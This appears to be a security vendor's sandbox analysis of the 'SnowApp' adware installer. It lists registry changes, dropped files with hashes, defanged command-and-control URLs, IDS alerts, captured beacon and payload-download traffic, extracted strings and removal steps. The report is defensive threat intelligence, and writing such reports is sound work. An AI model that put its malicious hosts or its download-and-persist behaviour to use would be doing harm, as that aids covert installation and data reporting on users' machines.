"1520c6f1" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"f1f24e29" = "Vl/l/C/////%"
"f2c53c49" = "UlAr/XJ/c//k////"
"c24899a6" = "Vx/g/CD/Mx////%%"
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"48bd1aff" = "V/////%%"
"c99a5f5c" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D D4 AC FF F5 92 0C D7 84 BB 2F A7 D9 05 25 80"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2e22d94e" = "///%"
"3c09c42b" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"bbf88800" = "///%"
"72758a5d" = "///%"
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"
"d1abcdb6" = "///%"
"27ddcf6f" = "///%"
"7f69fa1f" = "///%"
Dropped PE files
| MD5 | File path |
|---|---|
| c28c3116543d19ffee5966b48581b7ed | c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll |
| e717f6ce3a7429bfa6d7f3cf66737a4b | c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe |
| af7ce801c8471c5cd19b366333c153c4 | c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll |
| aef1a3ee471bad9c1afdd55d8393022a | c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll |
| deba33db167548f8bbac30f5d78eb168 | c:\Documents and Settings\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe |
| 6e89f4b401bcccc256e1cc3b4fdf7538 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe |
| deba33db167548f8bbac30f5d78eb168 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe |
| 5ce98607a87161745eff43f9bf6fb35e | c:\Program Files\DeltaFix\DeltaFix.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: SnowApp
Product Name: SnowApp
Product Version: 1.0.0.3
Legal Copyright: Copyright (c) 2014 SnowApp
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2014.3.11.1505
File Description: Installer for SnowApp
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 7672 | 7680 | 4.5056 | b1ae6dcdc3a7ba319c6d5e0b1a2eadbc |
| .rdata | 12288 | 1794 | 2048 | 3.26018 | cd4f20f041a2da05dfe5974fe61bd4ec |
| .data | 16384 | 1040 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 20480 | 8288 | 8704 | 2.75811 | be877d4afa5e8f40b68552c522aaa393 |
| .reloc | 32768 | 348 | 512 | 2.09579 | 938152484b33bca77bd622973abb524e |
| .tsustub | 36864 | 120967 | 121344 | 5.54288 | df422ecdecc6d2491d6afa0ac3da5332 |
| .tsuarch | 159744 | 176128 | 176128 | 5.54408 | 2f694139e897b2022d22b692668603c8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1116
URLs
| URL | IP |
|---|---|
| hxxp://getapplicationmy.info/?report_version=5& | |
| hxxp://getapplicationmy.info/?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A | |
| hxxp://webhomeusa.info/DeltaFix.exe | |
| hxxp://cnnintl-56m.gslb.vgtf.net/ | |
| hxxp://techine.info/get/?data=Ea/L5UVwLYSXbKdG+xSC1ZMmU2dX2NtPlTdeDQZBlSh0EnzIs83wmYHhAIR5XkEgk0AeaImOCqrUU09WiJ9nROfBu4aYbSIDIEUGvOb5vRSVkPUfKpXld5uMcXrYRZ05wtdW0RfcEfoYwjxKaREsrFsEJUswLM2MFEiqz43XPu0YYffaYfN0Gq5IJZISowp4Pt0B/f9Jd/wmvUYeI9SdO1tMBNH7NQOI53krPYw9F02YFjKz0K9cxZG2cfdnhhBiR6whpnywhNaGKraHn+y5hBADk+wXenjVuBrY6uWrDXVccBEkoOXb6s1Z59uqAb9Eem/4ri5DqdNnZw3K+zbk5eyfT7Z+OKTwW9nthJxGvrBSy7i4gmqYRvWXy7uhFazvJYi1zXKkY7eqP8u8VQtLDVWAFQxznaUHyP1HqyB//xhn/ZMO2uhnqAuq0u2Mi7c3ll7euVk9MSUO5P9rK6/6Lf3ZurUv2OBPNKhpPb2jlVFwIq08uHhlUfyC2H4oPvMDZGk+MXJ47VrerE1cu7GvBs6/QBC+1ffYz1ZCf9jxjhFrTDtMcXkKfR5eISoeDfzt&version=4 | |
| hxxp://getapplicationmy.info/?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A | |
| hxxp://i1.proffiiget.in/addons/agup.exe | |
| hxxp://edition.cnn.com/ | |
| hxxp://c1.getapplicationmy.info/?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A | |
| hxxp://r1.getapplicationmy.info/?report_version=5& | |
| hxxp://c1.getapplicationmy.info/?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.getapplicationmy.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 16:00:07 GMT
Content-Type: text/html
Content-Length: 6794
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
GET /get/?data=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&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Nov 2014 16:00:07 GMT
Content-Length: 0
Connection: close
GET /addons/agup.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.proffiiget.in
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Fri, 28 Nov 2014 15:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 773632
Last-Modified: Wed, 17 Sep 2014 09:31:05 GMT
Connection: close
Accept-Ranges: bytes
POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.getapplicationmy.info
Content-Length: 2002
Cache-Control: no-cache
data=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
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 16:00:10 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}
GET /?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.getapplicationmy.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: text/html
Content-Length: 6534
Connection: close
Content-Disposition: attachment; filename="1.txt"
HEAD / HTTP/1.1
Host: edition.cnn.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Nov 2014 16:00:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: CG=CA:QC:Montr.al; path=/
Last-Modified: Fri, 28 Nov 2014 15:59:18 GMT
Vary: Accept-Encoding
Cache-Control: max-age=60, private
Expires: Fri, 28 Nov 2014 16:00:50 GMT
POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.getapplicationmy.info
Content-Length: 1677
Cache-Control: no-cache
data=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&info=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
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}
GET /DeltaFix.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: webhomeusa.info
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: application/octet-stream
Content-Length: 6180864
Last-Modified: Fri, 28 Nov 2014 13:05:07 GMT
Connection: close
ETag: "54787303-5e5000"
Accept-Ranges: bytes
The Trojan connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
There is not enough memory to run the file %s.
Please close other windows and try again.
The file %s or one of its components could not be opened.
The file %s or one of its components cannot run.
The file %s or one of its components requires a different version of Windows.
The file %s or one of its components cannot run in standard or enhanced mode Windows.
Another instance of the file %s is already running.
An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
SystemProlonger.exe_1612:
.text
`.rdata
@.data
.rsrc
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
load x
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USERENV.dll
GetCPInfo
20120606
c:\documents and settings\all users\application data\snowapp\systemprolonger\SystemProlonger.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<!--Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><!--Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
portuguese-brazilian
%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
E OpenPT: %x
E EES: %x
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)
DeleteFile('%s') E1:%d;E2:%d
DeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%d
DeleteFile('%s') OK
'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}
execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated
['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%d
E:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install <path> E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1404
usetup.exe:220
SystemProlonger.exe:1612
SystemProlonger.exe:608
putfu.exe:1320
rundll32.exe:1676
rundll32.exe:512
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe (198289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (3312 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe (198289 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\52feb8d0a4447f79e3f56fe4a8a588f5.log (1657732 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe (25824 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe (26080 bytes)
%WinDir%\Tasks\SystemProlonger-S-4177913480.job (696 bytes)
%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\4177913480.ini (36544 bytes)
%Program Files%\DeltaFix\DeltaFix.dll (260858 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.